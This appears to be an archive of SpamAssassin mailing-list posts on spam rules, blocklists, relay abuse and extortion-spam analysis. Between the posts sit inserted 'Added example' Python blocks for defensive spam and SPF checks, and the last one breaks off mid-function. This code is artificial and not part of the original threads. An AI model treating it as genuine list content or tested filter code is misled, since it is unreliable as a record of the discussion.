questions on spamassassin

2020-09-05 Thread Rajesh M
dear friends,

had a few questions

1) what is the sequence based on which the rules are processed?
is there any documentation on this?
how is the rule file number, for example 20_dnsbl_tests.cf or 25_uribl.cf, related to the
sequence of rule processing?

2) is there a way by which, if a specific rule is triggered, I can stop all 
further processing?
basically we plan to implement certain rules related to specific body or header 
content which we are sure is spam and do not wish to process any further, and 
these will be placed in the local.cf file at the beginning

thanks and regards
rajesh




Re: Spam from Turkey?

2020-09-01 Thread M. Omer GOLGELI
Hi,

Some networks here are known to be more accommodating to spam. 
I wouldn't actually call these "ISPs"
These are usually one-man-show hosting companies with either no care or 
knowledge. 

I don't think it would hurt anyone if you are to block their complete IP ranges.
But going back through my logs by a month, it seems I got some too. 

They don't send to generic mail addresses and they seem to be using legit user 
mails. I presume they operate on a mail list.
And they seem to use lots of useless TLDs with different domain names in their 
spams and as they seem to hit

UriRBLs (centuryfear.guru:SURBL,SURBL,URIBL,SPAMHAUSDBL)
or
PreRBLs (TRUNCATEGBUDB,BLOCKLISTDE)

they get denied instantly


Did you try contacting via abuse?




M. Omer GOLGELI
---


August 31, 2020 8:15 AM, "Bill Cole"  
wrote:

> On 30 Aug 2020, at 3:02, Anders Gustafsson wrote:
> 
>> Hi!
>> 
>> Over the last months the real egregious spammers have all been from
>> Turkish ISPs. Had 15+ of them during this morning from Meric Internet
>> Teknolojileri A.S. anyone seen this as well?
> 
> On some systems but not others, so apparently it's somewhat targeted. 
> 45.136.7.0/24 most recently.
> All listed on SBL-CSS.
> 
> -- Bill Cole
> b...@scconsult.com or billc...@apache.org
> (AKA @grumpybozo and many *@billmail.scconsult.com addresses)
> Not For Hire (currently)


Re: ANNOUNCEMENT: The NEW invaluement "Service Provider DNSBLs" - 1st one for Sendgrid-spams!

2020-08-22 Thread M. Omer GOLGELI
Sendgrid and their likes...

Checking 1 day's logs for 1 domain, I see that of the 17 SendGrid mails to hit 
my antispam gateway, 17 of them were spam from 9 distinct senders.

I can't deal with hunting spammers like that; giving a nice little score to the 
spam tools that allow this kind of mass mailing without checks is the better 
approach IMO. 





M. Omer GOLGELI


August 22, 2020 10:17 AM, "Benny Pedersen"  wrote:

> @lbutlr skrev den 2020-08-22 08:03:
> 
>> On 21 Aug 2020, at 14:15, Benny Pedersen  wrote:
>>> blacklist_from *+14927644-*
>> 
>> I think adding 5.0 to all sendgrid mail is the best idea I've heard.
>> Sendgrid makes me long for the days of the SPEWS RBL.
> 
> i am soon to be tired of it to add it to rpz in bind9


Re: Why the new changes need to be "depricated" forever

2020-07-22 Thread M. Omer GOLGELI
July 22, 2020 11:46 AM, "M. Omer GOLGELI"  wrote:


> Like Laura questioned, 

Oops!
/Laura/Loren/ my bad...




--
M. Omer GOLGELI


Re: Why the new changes need to be "depricated" forever

2020-07-22 Thread M. Omer GOLGELI
July 22, 2020 11:16 AM, "Charles Sprickman"  wrote:

>
> you’d like the
> whole world to adjust to your narrow views (which all center around your 
> experiences of the world,
> which of course are the only valid ones, right?). So yes, you’re a bunch of 
> snowflakes.
> 

This is a perfect explanation for this whole thing. People of the US, with their 
extremely racist backgrounds, deciding whether it's racist or not while being limited 
to their experiences of the world... 

Like Laura questioned, nobody in non-English-speaking countries cares about that 
as much as you guys since when most look at the word Black, all they see is the 
color Black...



July 22, 2020 11:16 AM, "Charles Sprickman"  wrote:

> You could have just packed up and left, used other software that didn’t 
> offend your gentle
> sensitivities, forked SA, or (IMO, the best option) just shut the f*ck up, 


July 22, 2020 10:39 AM, "Noel Butler"  wrote:
> if you dont like democracy at work (ppl having their say) , then you fuck off



Both of you are acting like children. Well done.
Nice language BTW.


--
M. Omer GOLGELI


Re: spamhaus enabled by default

2020-07-14 Thread M. Omer GOLGELI
Congrats on derailing another post needlessly.





M. Omer GOLGELI



July 15, 2020 12:41 AM, "Antony Stone" 
 wrote:

> On Tuesday 14 July 2020 at 23:23:29, Martin Gregorie wrote:
> 
>> On Tue, 2020-07-14 at 22:59 +0200, Antony Stone wrote:
>> On Tuesday 14 July 2020 at 21:46:11, Martin Gregorie wrote:
>>> This info should include lots of black (hashmarks, asterisks etc).
>> 
>> You should be careful of the language you use these days, especially
>> on this list.
>> 
>> Yes, I am being sarcastic about what you wrote, but I'm also being
>> serious about the apparent power of the language police.
>> 
>> I don't underestimate the power of the thought police (McCarthy was the
>> standout example of *THAT*) or their, sometimes wilful, ignorance. You
>> know what I meant, but if I'd written something like "include big blocks
>> of attention-getting high-density characters", might that be interpreted
>> as an attack on the comprehensionally challenged?
> 
> 1. Yes, and those sectors of society defending the mentally deficient might be
> somewhere back in the queue waiting their turn to have a bit of a go at us for
> talking like this
> 
> 2. My comment was not aimed at you in any way at all - it was an observation
> to other people on this list about a different discussion thread which you may
> have noticed in recent days (which, ironically enough, does include big blocks
> of attention-getting high-density characters in its subject line).
> 
> Antony.
> 
> --
> https://tools.ietf.org/html/rfc6890 - providing 16 million IPv4 addresses for
> talking to yourself.
> 
> Please reply to the list;
> please *don't* CC me.


Re: spamhaus enabled by default

2020-07-14 Thread M. Omer GOLGELI
July 14, 2020 6:07 PM, "Kevin A. McGrail"  wrote:

> The question you ask is exactly why we have the DNSBL Inclusion policy and 
> require the free for
> some model.
> 
> We might need to kick up the need for the BLOCKED rule with instructions in 
> that description on how
> to disable the rules. What are your thoughts on that?
> 

Don't get me wrong, I use them in the scoring process as well and I'm glad to 
use them along with a few others as I'm not that hard bent on keeping 
everything free.

And if I hit the limits somehow, I'll either pay for them or turn them off.

But there will always be people that don't want it.
Or those who wouldn't want to see their OSS software rely on commercial 
products.
Or there will be those who do this non-commercially. 
Or there will be people who installed it as part of their OSS mail product and 
don't know that there's such a limit, etc.

So for that matter, maybe these can be left to the admin's decision to enable 
them after installation.
Or all users should be made aware of these limitations in a better manner and 
clearly for each semi-commercial RBL used.








M. Omer GOLGELI


Re: spamhaus enabled by default

2020-07-14 Thread M. Omer GOLGELI
July 11, 2020 1:33 PM, "Riccardo Alfieri"  wrote:

> Excuse me but isn't it at least "fair" that, if you use a service provided by 
> others for commercial
> purposes, you pay for that service that contributes to your income?

It is fair.

Unless you have been unknowingly using it and weren't aware of the limits.

But maybe this kind of RBL shouldn't be on by default due to its commercial 
nature and must be left to the user to activate after installation.





M. Omer GOLGELI


Re: Technically not spam

2020-05-29 Thread M. Omer GOLGELI
Personally, 


I mark and categorize them as SPAM IF they do not have 1-2 click 
unsubscribing. Then they are spam. 
99% of the time these are senders who opt you in automatically to a few lists 
without double opt-in whilst never giving you a choice of what to ask for, or 
even when they do, they do not abide by it. If they are not decent enough to at 
least let you get off their spam list with 1-2 clicks, I'm gonna write 
rules against them, teach spamassassin and for some persistent ones, I'll even 
report them.

(Most of Google Groups, Twitter and Facebook emails go to the same category 
coincidentally because even if the mail addresses do not exist, you cannot get 
out of the list and can't report the address as fake)




--
M. Omer GOLGELI


May 29, 2020 6:40 PM, "@lbutlr"  wrote:

> How do people deal with lists that a user subscribed to that require logging 
> in to an account to
> unsubscribe? I seem to be seeing a lot more complaints from users who cannot 
> get off lists
> (probably because they didn't realize they were creating an account for 
> getting multiple-mails per
> day).
> 
> Most legitimate mails have a simple unsubscribes list, but many online stores 
> seem to "forget" to
> do this.
> 
> I can't just blacklist the IPs because some people want these emails.
> 
> -- 
> Stomach in! Chest out! on your marks! get set! GO! Now, now that
> you're free, what are you gonna be? Who are you gonna see? And
> where, where will you go, and how will you know you didn't get it
> all wrong?


Re: Question on early detection for relay spam

2020-03-04 Thread M. Omer GOLGELI
If password rotating is out of the question, you might want to check your IPs 
against blacklists multiple times a day; it wouldn't stop it but it may 
notify you earlier to stop an outbreak.

Another thing that comes to mind is that you may try rate limiting your users and 
setting up a cron to monitor the number of outgoing messages and notify you if 
there's a sudden surge of mail requests.





M. Omer GOLGELI
---
AS202365

  https://as202365.peeringdb.com 
  https://bgp.he.net/AS202365 

NOC:
 Phone: +90-533-2600533
 Email:  o...@chronos.com.tr


March 3, 2020 10:26 AM, "Ted Mittelstaedt"  wrote:

> I know this is probably off topic but I'm getting desperate enough to ask.
> 
> I run a commercial mailserver that regularly seems to have spammers relay 
> mail through it that have
> obtained stolen credentials for a user. Many years ago I stopped allowing 
> users to change passwords
> on it and I setup passwords for all users added to it, and the passwords are 
> random strings of 8
> characters or more.
> 
> The problem is of course that since the passwords are difficult to remember, 
> once the users do
> remember them they merrily proceed to use
> this "highly secure password that I can now remember" on every stupid
> website out on the Internet that they care to login to. The problem
> isn't really the people using Thunderbird or Outlook or their cell phones or 
> whatever, because they
> save the password in the email client and then immediately forget it, which 
> is what I want. It is
> the people who use the webmail interface on multiple different systems, kiosk
> computers and the like, who are the problem. When hosts out on the
> Internet get busted into, the spammers get their passwords and
> email addresses and start relaying. I've confirmed this with several
> users I've called and it's always the same story.
> 
> By the time I see what's going on the server is blacklisted everywhere
> and I have to waste time delisting it, and asskissing all of the
> little tiny blacklists run by little pricks who want me to pay money
> or wait a month to be delisted, etc. (no I'm NOT talking about
> spamcop, or barracuda or anyone professional - THEY know what they are
> doing and don't look at this as a chance for a shakedown)
> 
> I estimate that last year this happened around 5 times and I just
> lost an afternoon today answering the passle of help requests from
> users because it happened again.
> 
> What I am wondering is how to tighten up my monitoring on my servers to
> more rapidly identify when this starts happening. What I'm doing now is
> a kludge but I run mailq (this is a sendmail system) and when I see the
> number of pending mail messages in there exceed a threshold I send an alert to 
> my cell. It is a
> kludge and the problem is that
> the mailq doesn't start filling up until my server gets blacklisted.
> 
> I've considered several ideas like running a script out of cron that
> checks the number of authid's per hour but all of these seem like even
> worse kludges. The only idea that I have come up with that I really
> like is taking an AK-47 to the spammers but unfortunately spammers
> know that they are unloved and cowardly hide away in Russia and scummier
> places and I can't reach 'em. (maybe I could offer a bounty? A nickel a head? 
> That would pay for
> the bullet at least. I don't think those people are worth even that, though)
> 
> I do run a daily sendmail statistics report but by the time I read that
> and see the bump in traffic it's too late.
> 
> What do other people do for this problem?
> 
> Ted
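Added example, not part of Ted's or Omer's posts: a Python script that does the per-hour authid count Ted considered and the surge check Omer suggests, run over a constructed log. It assumes the sendmail "AUTH=server ... authid=" log line shape encoded in LOG_RE (adapt it to your syslog format) and the thresholds are placeholders to tune against your own baseline; a compromised account typically shows up as both a jump in messages per hour and logins from many unrelated addresses in that hour.

```python
import re
from collections import defaultdict

# Assumed shape of sendmail's "AUTH=server" entry; adjust to your MTA/syslog format.
LOG_RE = re.compile(
    r"^(?P<day>\w{3}\s+\d+) (?P<hour>\d\d):\d\d:\d\d \S+ sendmail\[\d+\]: \S+: "
    r"AUTH=server, relay=.*?\[(?P<ip>[\d.]+)\], authid=(?P<user>[^,]+), mech="
)


def _line(hh, mm, qid, ip, user):
    # Constructed sample entry, not a real log line.
    return (f"Mar  3 {hh:02d}:{mm:02d}:00 mx sendmail[{qid}]: 023E2C{qid:02X}: "
            f"AUTH=server, relay=[{ip}], authid={user}, mech=PLAIN, bits=0")


def build_sample_log():
    lines = [_line(9, 12, 1, "203.0.113.5", "alice"),
             _line(9, 15, 2, "203.0.113.5", "alice")]
    # "bob": 40 authenticated submissions in one hour from 8 different addresses.
    for i in range(40):
        lines.append(_line(10, i, 3 + i, f"198.51.100.{1 + i % 8}", "bob"))
    return "\n".join(lines)


SAMPLE_LOG = build_sample_log()


def parse_auth_events(log_text):
    """Yield (hour-bucket, authid, client-ip) for every authenticated session."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append((f"{m['day']} {m['hour']}:00", m["user"], m["ip"]))
    return events


def find_surges(log_text, per_hour_limit=30, distinct_ip_limit=5):
    """Accounts whose hourly submission count or client-IP spread exceeds the limits."""
    counts = defaultdict(int)
    ips = defaultdict(set)
    for hour, user, ip in parse_auth_events(log_text):
        counts[(hour, user)] += 1
        ips[(hour, user)].add(ip)
    alerts = []
    for key in sorted(counts):
        n, spread = counts[key], len(ips[key])
        if n > per_hour_limit or spread > distinct_ip_limit:
            alerts.append({"hour": key[0], "user": key[1],
                           "messages": n, "distinct_ips": spread})
    return alerts


if __name__ == "__main__":
    for alert in find_surges(SAMPLE_LOG):
        print("ALERT", alert)
```

Run from cron against the last hour of the maillog and page yourself on any non-empty result; the distinct-IP count is the more useful of the two signals, since it fires before the queue backs up and does not depend on the server already being listed.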


RE: New bitcoin ransom message today

2019-12-19 Thread Chip M.
On Wed, 18 Dec 2019, John Hardin wrote:
>Can you post a spample

This is a very interesting pattern that I've seen in a few (9) spams
this week.
Here's a spample (with only the To header MUNGED):
http://puffin.net/software/spam/samples/0062_snow_style_chaff_aws.txt
Lindsay, is that what you're seeing?

All 9 have scored above SA's default threshold, however most just
barely. The biggest scoring hit was "TO_NO_BRKTS_DYNIP".
None hit any GIBBERISH test, though that could be an issue with the
webhost (it's a shared "plain vanilla" SA install, not a custom
tuned one).

What I found interesting was both the style chaff and the use of 
"storage.googleapis" to hide the payload.
Google appears to have disabled the one in this spample.
The one I looked at yesterday had a "Meta refresh" to an 
intermediate URL, which had a javascript redirect
(via "window.location.href") to the final target.
Both domains were relatively recently registered and both are _NOT_
on any major domain blocklist.

Another interesting "tell" is its sloppy/ridiculous SPF:
v=spf1 ip4:52.0.0.0/8 ip4:3.0.0.0/8 ip4:54.0.0.0/8 ip4:107.0.0.0/8 
ip4:18.0.0.0/8 ip4:34.0.0.0/8 -all
Perhaps they're anticipating Amazon gobbling up more IP space?!?


Since the OP asked about non-SA approaches...
All hit my own filter's style size ratio test, with a
range of 98.3% to 99.1%.
I'm not a Perl programmer, so do not know if that is a practical
test to implement in SA.
It amazes me how much ham scores high on that!
I did a quick check of the last month for a highly diverse domain
and of emails with at least 90% "style", 16.7% were spam (all snow)
and 7% were ham (all ESP).
Next week I'll be datamining, so will look at that in more detail.


I've been scoring "storage.googleapis", however it's used by a lot
of non-security-competent Hammers, so it's difficult to give it more
than a small score.
IMO it would be worthwhile to score it at least a wee bit in case
that would help anybody convince their PHB that it's a Bad Practice.

John, perhaps a meta for style issues, AWS, and googleapis?
- "Chip"
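Added example, not from Chip's post or his filter: Python versions of the two checks he describes, the "sloppy SPF" breadth test and the style-size ratio. The SPF record is the one quoted above; the HTML body and the thresholds are constructed placeholders.

```python
import ipaddress
import re

IPV4_SPACE = 2 ** 32

# The record quoted in the post: six /8 networks.
SLOPPY_SPF = ("v=spf1 ip4:52.0.0.0/8 ip4:3.0.0.0/8 ip4:54.0.0.0/8 ip4:107.0.0.0/8 "
              "ip4:18.0.0.0/8 ip4:34.0.0.0/8 -all")
# Constructed tight record for comparison.
TIGHT_SPF = "v=spf1 ip4:203.0.113.0/24 -all"


def spf_ipv4_networks(record):
    """ip4: networks in an SPF record, overlaps collapsed so nothing is counted twice."""
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    nets = []
    for term in terms[1:]:
        mech = term.lstrip("+-~?")
        if mech.lower().startswith("ip4:"):
            nets.append(ipaddress.ip_network(mech[4:], strict=False))
    return list(ipaddress.collapse_addresses(nets)) if nets else []


def spf_ipv4_coverage(record):
    nets = spf_ipv4_networks(record)
    total = sum(n.num_addresses for n in nets)
    widest = min((n.prefixlen for n in nets), default=None)
    return {"addresses": total, "fraction": total / IPV4_SPACE, "widest_prefix": widest}


def spf_is_overly_broad(record, max_fraction=0.001, min_prefix=16):
    """Flag records that authorise more than max_fraction of IPv4 or any prefix shorter than min_prefix."""
    c = spf_ipv4_coverage(record)
    too_wide = c["widest_prefix"] is not None and c["widest_prefix"] < min_prefix
    return c["fraction"] > max_fraction or too_wide


STYLE_RE = re.compile(r"<style\b[^>]*>.*?</style>", re.I | re.S)


def style_ratio(html):
    """Share of the HTML body (by character count) that sits inside <style> blocks."""
    if not html:
        return 0.0
    styled = sum(len(m.group(0)) for m in STYLE_RE.finditer(html))
    return styled / len(html)


# Constructed chaff: a big <style> block and a tiny visible message.
CHAFF_HTML = ("<html><head><style>" + ".c{color:#000}" * 400 + "</style></head>"
              "<body><p>pay now</p></body></html>")
```

Neither check is a verdict on its own: a large mailer may legitimately list several /16s, and marketing templates from ESPs carry a lot of CSS, which is the ham Chip mentions scoring high. Treat both as small contributions to a score, and use the style ratio together with other signals rather than alone.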




RE: New bitcoin ransom message today

2018-12-13 Thread Chip M.
As requested:
http://puffin.net/software/spam/samples/0061_bitcoin_splosion.txt
I MUNGED the "To".
It's the latest of two sent to me by an awesome volunteer. :)

First thoughts:
Both were base64 encoded.
Both have "disclaimers" that they're not terrorists. :roll-eyes:

John Hardin: I'll ask for a full bundle from this volunteer (he's in your time 
zone), and send you full spamples of everything relevant.
- "Chip"



Re: 9D character used in words to avoid detection

2018-11-18 Thread Chip M.

Ditto to what John said, however, thanks for the spample Mark. :)

Mark, is that the exact network image?
If not, do you have access to it? If so, please pastebin it.
By "network image", I mean not-mangled by any post filter software.

Your posted spample is quoted-printable, and should have been decoded 
then hit some bitcoin/sextortion specific rules.
In your spample, the Content headers are borked, and it wasn't 
recognized as qp, hence the abundant "9D" artifacts.


I ran it as-is, and it scored poorly.
After I manually de-borked the headers, and retested, it hit SA's 
"OBFU_BITCOIN" and my own anti-bitcoin/sextortion & hi-Ascii-count tests.


The question is, is that broken header pattern in the original, and 
if so, should it be detected & scored, in-and-of-itself?

We'd need the most pristine original, before proceeding. :)
- "Chip"

P.S. Sorry for the lack of Reply headers.  I'm on the road, with limited tools.
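Added example, not from Chip's post: Python that detects the situation he describes, a body that is quoted-printable on the wire but whose Content headers did not declare it, decodes it anyway, and then applies a high-ASCII count and an intra-word noise strip so a keyword test still fires. The sample body is constructed (it uses =E2=80=9D, a curly quote, as the wedged character); the real 9D bytes in Mark's spample may have been something else.

```python
import quopri
import re

QP_TOKEN = re.compile(r"=[0-9A-F]{2}")
QP_SOFT_BREAK = re.compile(r"=\r?\n")

# Constructed body: quoted-printable, but delivered without a
# Content-Transfer-Encoding header, so the "=E2=80=9D" sequences stay raw.
SAMPLE_BODY = ("I have your pa=E2=80=9Dssword. Send 0.5 bitc=E2=80=9Doin to the "
               "addr=E2=80=9Dess below.\n")


def looks_like_undeclared_qp(text, min_tokens=5):
    """Heuristic: a body full of =XX escapes or =\\n soft breaks that nobody decoded."""
    return len(QP_TOKEN.findall(text)) + len(QP_SOFT_BREAK.findall(text)) >= min_tokens


def decode_qp_body(text, charset="utf-8"):
    """Decode as quoted-printable regardless of what the headers claimed."""
    raw = quopri.decodestring(text.encode("ascii", "replace"))
    return raw.decode(charset, errors="replace")


def count_non_ascii(text):
    """The 'hi-ASCII count' signal: characters above 0x7F in the decoded body."""
    return sum(1 for ch in text if ord(ch) > 127)


def strip_intraword_noise(text):
    """Remove non-ASCII characters wedged between word characters ('bitc\u201doin' -> 'bitcoin')."""
    return re.sub(r"(?<=\w)[^\x00-\x7f]+(?=\w)", "", text)


def normalise_for_keywords(text):
    """Pipeline a body test would run before matching phrases."""
    if looks_like_undeclared_qp(text):
        text = decode_qp_body(text)
    return strip_intraword_noise(text).lower()
```

The decoding step is the important one: without it the "9D" artifacts sit inside the words and an exact phrase rule never sees "bitcoin"; with it, the decoded text still carries three high-ASCII characters that the count test can score on its own.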



spample: porn extortion with pure numeric From domain and base64 body

2018-07-17 Thread Chip M.
There's a new morph of the porn extortion campaign, with some
interesting under-the-hood changes.

The previous ones were always:
- two "quoted-printable" parts (plain text, html)
- "From" Outlook accounts
- sent via Outlook/Hotmail/MS IPs (no other IPs in route)
- passed both DKIM and SPF

The new version has:
- one base64 html part
- pure numeric "From" domain (same address in SMTP & header)
- sent via compromised computers (and typically 3 or 4 Received IPs)
- bogus domains so neither DKIM nor SPF possible
- 8 of 13 samples had a Reply-To, with the same address as the From,
  and the RealNames were different

Unchanged:
- html part has hundreds of comments containing just the To account
- pretty much the same message
  (new versions have some potentially useful HTML/comment chaff)
- _ALL_ have snuck thru plain vanilla SA :(
  (old Outlooks ones were consistently less than 1.0;
   new: 92% in 2s, 8% in very low 4s)

Currently, all IPs except one (the oldest) are on the CBL.

Full raw spample:

http://puffin.net/software/spam/samples/0058_extortion_numeric_domain.txt
I MUNGED the "To" and the Body.
Since I munged the account name to "target", I had to re-encode the
Body.
** John Hardin & KAM:  if you'd like some unmunged spamples, I'd be
happy to send a zip. :)

Here's the SA test stats for 13 of this new morph:
  FORGED_MUA_MOZILLA  1
  HTML_MESSAGE   13
  HTML_MIME_NO_HTML_TAG  13
  LOCALPART_IN_SUBJECT   13
  MIME_BASE64_TEXT9
  MIME_HTML_ONLY 13
  RCVD_IN_SORBS_DUL   1
  RDNS_DYNAMIC3
  TVD_RCVD_SPACE_BRACKET  6
  UNPARSEABLE_RELAY   6

This new variant should be easy to exterminate. :)

1. The quick and easy combo of "HTML_MIME_NO_HTML_TAG" and
   "LOCALPART_IN_SUBJECT" is worth a meta.
   The latter test is _VERY_ rare in Ham.
2. Another meta with those two and "MIME_BASE64_TEXT" is even safer.
3. Pure numeric TLDs appear to be non-existent (so far!), so I look
   forward to you regex wizards doing your thing. :)
4. There's lots of low risk phrases worth scoring (KAM rules?).
5. Riskier & more complex:  The pattern of the account name occurring
   hundreds of times in HTML comments is distinctive, and "feels"
   safe, however Thick Hammers are unpredictable.
   I will be releasing a regression test for my volunteers.
   Once I get sufficient Ham stats, I'll report back.


Three other unusual things (all demonstrated in this spample):

1. 9 of the 13 had a two part pure numeric claimed host (see below).
I don't recall seeing that before.
** Is that a botnet fingerprint?

2. 9 of the 13 lacked a trailing "=".
I don't recall seeing that before.
It's probably worth a quick test, if easy to implement.
There was no correlation with the numeric host pattern.

3. 4 of the 13 failed to hit "MIME_BASE64_TEXT".
I'm curious what the issue is.
The trailing "=" was not a factor.
The main thing that stood out is that the hits all had this CT:
Content-Type: text/html;
charset="us-ascii"
The misses all had:
Content-Type: text/html;
charset="iso-8859-1"


Here are the IPs, and the claimed hostnames in square brackets:
1.52.117.145[738.521]
5.76.183.251[926.664]
14.231.121.148  [253.975]
41.212.106.159  [41.212.106.159.wananchi.com]
42.113.254.123  [303.494]
49.205.51.26[broadband.actcorp.in]
94.233.89.142   [dsl-94-233-89-142.avtlg.ru]
103.86.161.66   [439.461]
109.60.246.66   [842.384]
180.252.178.204 [742.584]
196.190.63.7[982.491]
197.248.154.10  [197-248-154-10.safaricombusiness.co.ke]
202.138.244.76  [344.393]

Here are the actual (unmunged) From headers:
"Sofia Kirby" <066@842.384>
"Eugenia Koch" <340@145.390>
"Trisha Savage" <907@344.393>
"Debra Arnold" <367@439.461>
"Christine Waller" <294@982.491>
"Lawrence Bender" <516@303.494>
"Rey Wooten" <381@738.521>
"Elvira Nguyen" <977@557.566>
"Mai Mullins" <556@742.584>
"Darrick Hendricks" <540@926.664>
"Pablo Hess" <692@442.947>
"Elba Olsen" <255@434.964>
"Millie Weber" <041@253.975>


We're killing 100% of these (post plain-vanilla SA), mainly due to
IP Nation tests, lots of custom body phrase tests, and some body
"stupid tricks" tests.

I've just added the above suggested SA metas, and a 
low level (non-regex) pure numeric TLD test.

I expect more morphs.
- "Chip"

P.S.  It occurred to me that the complete lack of Sender Verification
in these could benefit spammers. There's zero DKIM processing
overhead, so these should be processed a wee bit faster by
non-graylisting receivers. That could make the difference in whether
it hits a post-gateway blocklist.
** Does anyone have performance stats on how long DKIM processing
takes?
That might explain the drop in DKIM usage by snowshoers.
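Added example, not from Chip's post or his filter: a Python analyser that computes, on a constructed message built in the same shape as the morph above, the signals he lists (pure numeric From domain, To localpart in the Subject, HTML-only part with no <html> tag, base64 text, the trailing "=" check, Reply-To with the same address but a different name, and the count of HTML comments carrying the localpart) and combines the three he proposes as a meta. The From address reuses one of the values quoted in the post; everything else about the message is constructed.

```python
import base64
import email
import re
from email import policy
from email.utils import parseaddr


def build_sample_message():
    """Constructed message in the shape of the morph: base64 html, numeric From domain, comment chaff."""
    localpart = "target"
    comments = "".join(f"<!-- {localpart} -->\n" for _ in range(300))
    html = comments + "<p>Pay the amount below or else.</p>\n"   # note: no <html> tag
    body = base64.b64encode(html.encode("ascii")).decode("ascii")
    wrapped = "\n".join(body[i:i + 76] for i in range(0, len(body), 76))
    return (
        "Received: from [738.521] (unknown [192.0.2.10]) by mx.example.net\n"
        'From: "Rey Wooten" <381@738.521>\n'
        'Reply-To: "Darrick Hendricks" <381@738.521>\n'
        f"To: <{localpart}@example.net>\n"
        f"Subject: {localpart}\n"
        "MIME-Version: 1.0\n"
        'Content-Type: text/html; charset="us-ascii"\n'
        "Content-Transfer-Encoding: base64\n"
        "\n" + wrapped + "\n"
    ).encode("ascii")


SAMPLE_RAW = build_sample_message()


def is_pure_numeric_domain(addr):
    """True when every label of the domain part is digits only (e.g. 381@738.521)."""
    labels = addr.rpartition("@")[2].split(".")
    return len(labels) >= 2 and all(label.isdigit() for label in labels)


def base64_padding_missing(encoded):
    """Base64 text whose length is not a multiple of 4 and that has no '=' padding."""
    stripped = re.sub(r"\s+", "", encoded)
    return len(stripped) % 4 != 0 and not stripped.endswith("=")


def analyse(raw):
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_name, from_addr = parseaddr(str(msg.get("From", "")))
    reply_name, reply_addr = parseaddr(str(msg.get("Reply-To", "")))
    to_addr = parseaddr(str(msg.get("To", "")))[1]
    localpart = to_addr.split("@")[0].lower()
    subject = str(msg.get("Subject", "")).lower()
    ctype = msg.get_content_type()
    cte = str(msg.get("Content-Transfer-Encoding", "")).lower()
    payload = msg.get_payload() if not msg.is_multipart() else ""   # still encoded
    body = msg.get_content() if not msg.is_multipart() else ""      # decoded text
    comments = re.findall(r"<!--(.*?)-->", body, re.S)
    return {
        "numeric_from_domain": is_pure_numeric_domain(from_addr),
        "localpart_in_subject": bool(localpart) and localpart in subject,
        "html_only_no_html_tag": ctype == "text/html" and "<html" not in body.lower(),
        "base64_text": cte == "base64" and ctype.startswith("text/"),
        "base64_padding_missing": cte == "base64" and base64_padding_missing(payload),
        "replyto_same_addr_diff_name": bool(reply_addr) and reply_addr == from_addr
                                       and reply_name != from_name,
        "localpart_comment_count": sum(1 for c in comments if localpart in c.lower()),
    }


def looks_like_numeric_extortion(result):
    """The meta from the post: HTML-only with no <html> tag, localpart in Subject, base64 text."""
    return (result["html_only_no_html_tag"] and result["localpart_in_subject"]
            and result["base64_text"])
```

The comment-count signal is the one Chip flags as riskier; here it is returned as a number rather than folded into the meta, so it can be scored separately once ham statistics are in.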




SPF PermError (was: "Re: Scans and Invoice spam containg HREF to something bad")

2018-06-27 Thread Chip M.
On Tue, Jun 19, 2018 at 11:00 AM, Andy Smith  wrote: 
> Testing despite these errors the only rule I'm getting a hit on from KAM 
> is JMQ_SPF_NEUTRAL_ALL 

Andy, thanks for the very useful spamples! :)

Could somebody do a sanity check on the SPF record for 
"ballybofeycarpets.com"?
I get a PermError, not SPF_NEUTRAL.
I checked using 2 different DNS servers.

Is that a bug, or an intentionally incomplete implementation?
If one skips the "a mx ptr" mechanisms, it would return Neutral.

In the first version of my own SPF code, I chose just to implement
the "ip4" and "include" mechanisms, on the theory that nobody in
their right mind would use the above three... and, of course, was
subsequently surprised at the high rate of non-right-mindedness. ;)
(I blame the abundant poor examples cut-and-pasted by cheap/bulk
webhosting companies.)


Occasionally, I see PermError with Really Big companies.
Typically, they do have a DMARC record, so should be receiving
reports, however I rarely see the problem(s) fixed.
If some SPF implementations are not returning PermError, that would
explain some of those.

*** Is there some generally accepted way to contact those companies?
Maybe their Postmaster?
Probably a lost cause, but it's frustrating seeing Broke Stuff. :(
- "Chip"
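Added example, not from Chip's post or his SPF code: a small Python check_host() that implements the "a", "mx", "ptr" and "include" mechanisms alongside "ip4"/"ip6", counts the DNS-querying mechanisms against the RFC 7208 limit of 10, and can be switched into the "skip what I don't implement" mode Chip describes, so you can see the same record come back Neutral from the partial evaluator and Pass or PermError from the full one. The zone data is a constructed stub so it runs offline; the record for ballybofeycarpets.com is not reproduced here, and redirect=/exp= modifiers and the dual-CIDR syntax are not modelled.

```python
import ipaddress

MAX_DNS_LOOKUPS = 10          # RFC 7208 section 4.6.4
QUALIFIER = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
ALL_MECHANISMS = ("all", "ip4", "ip6", "a", "mx", "ptr", "include")

# Constructed stub zone so the example runs offline; keys are (name, rrtype).
STUB_DNS = {
    ("example.com", "A"): ["192.0.2.10"],
    ("example.com", "MX"): ["mail.example.com"],
    ("mail.example.com", "A"): ["192.0.2.20"],
    ("30.2.0.192.in-addr.arpa", "PTR"): ["host30.example.com"],
    ("host30.example.com", "A"): ["192.0.2.30"],
    ("_spf.provider.example", "TXT"): ["v=spf1 ip4:198.51.100.0/24 -all"],
}


class StubResolver:
    def __init__(self, table):
        self.table, self.lookups = table, 0

    def query(self, name, rrtype):
        return self.table.get((name.lower(), rrtype), [])


def evaluate(record, ip, domain, resolver, supported=ALL_MECHANISMS, skip_unknown=False):
    """Simplified check_host(): returns pass/fail/softfail/neutral/permerror."""
    ip = ipaddress.ip_address(ip)
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "permerror"

    def over_limit():
        resolver.lookups += 1
        return resolver.lookups > MAX_DNS_LOOKUPS

    for term in terms[1:]:
        if "=" in term.split(":", 1)[0]:
            continue                      # modifiers (redirect=, exp=) not modelled here
        qual = "+"
        if term[0] in QUALIFIER:
            qual, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech not in supported:
            if skip_unknown:
                continue                  # what a partial implementation does
            return "permerror"            # what RFC 7208 requires for an unknown mechanism
        target = (arg or domain).lower()
        if mech == "all":
            return QUALIFIER[qual]
        if mech in ("ip4", "ip6"):
            if ip in ipaddress.ip_network(arg, strict=False):
                return QUALIFIER[qual]
            continue
        if over_limit():                  # a, mx, ptr, include each cost one lookup
            return "permerror"
        matched = False
        if mech == "a":
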